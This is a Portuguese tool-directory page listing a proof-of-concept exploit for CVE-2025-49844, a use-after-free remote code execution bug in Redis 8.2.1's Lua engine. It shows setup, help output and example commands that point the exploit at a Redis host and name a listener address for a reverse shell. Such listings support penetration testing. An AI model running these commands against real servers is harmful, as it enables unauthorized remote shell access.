Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-49844 — CVE-2025-49844 | Kitploit
Ferramentas/GitHubGitHub/cilectiy/cve-2025-49844
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubcilectiy/cve-2025-49844

CVE-2025-49844

CVE-2025-49844

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-49844

Original uv POC: https://github.com/saneki/cve-2025-49844

PoC que fornece shell reverso.

Antes de Começar

pip3 install -r requirements.txt

Ajuda

python3 CVE-2025-49844.py -h

root@kitploit:~
usage: CVE-2025-49844.py [-h] [-H HOST] [-P PORT] [-a PASSWORD] [-l HOST] [-p PORT]

CVE-2025-49844 proof-of-concept — Redis 8.2.1 Lua UAF RCE (reverse shell)

options:
  -h, --help            show this help message and exit
  -H HOST, --redis-host HOST
                        Redis server host (default: 127.0.0.1)
  -P PORT, --redis-port PORT
                        Redis server port (default: 6379)
  -a PASSWORD, --auth PASSWORD
                        Redis password (if required)
  -l HOST, --host HOST  listener host (default: 127.0.0.1)
  -p PORT, --port PORT  listener port (default: 4444)

Examples:
  CVE-2025-49844.py -H 10.0.0.1 -l 192.168.1.10 -p 4444
  CVE-2025-49844.py -H 10.0.0.1 -P 6380 -a secretpass -l 192.168.1.10 -p 4444
Baixar ferramenta